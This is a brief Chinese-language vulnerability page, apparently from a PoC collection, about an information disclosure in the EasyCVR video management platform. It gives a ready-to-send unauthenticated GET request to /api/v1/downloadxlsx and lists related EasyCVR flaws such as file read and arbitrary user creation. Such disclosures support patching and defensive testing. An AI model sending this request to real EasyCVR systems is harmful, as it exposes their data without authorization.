EasyCVR /api/v1/downloadxlsx 敏感信息泄露漏洞

漏洞描述

PoC代码

GET /api/v1/downloadxlsx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• EasyCVR视频管理平台 downloadxlsx SQL注入漏洞
• 安徽旭帆信息科技有限公司EasyCVR存在账号密码泄露
• POC CVE-2025-1595: EasyCVR <=2.1.2 - Information Disclosure
• POC xunfan-easycvr-taillog-mediaserverlogs-fileread: 旭帆EasyCVR软件-taillog-mediaserverlogs任意文件读取
• POC easycvr-arbitrary-file-read: EasyCVR Video Management - Arbitrary File Read
• POC easycvr-userlist-info-disclosure: 视频监控汇聚平台 EasyCVR 用户信息泄漏
• EasyCVR 视频管理平台deleteuser存在任意用户删除漏洞
• EasyCVR 视频管理平台adduser存在任意用户添加漏洞
• EasyCVR视频管理平台 taillog 任意文件读取漏洞
• EasyCVR /taillog/oxsecl/ 文件读取漏洞
• POC EasyCVR-视频管理平台 mediaserverlogs 任意文件读取漏洞
• EasyCVR视频管理平台任意用户添加漏洞
• EasyCVR敏感信息泄露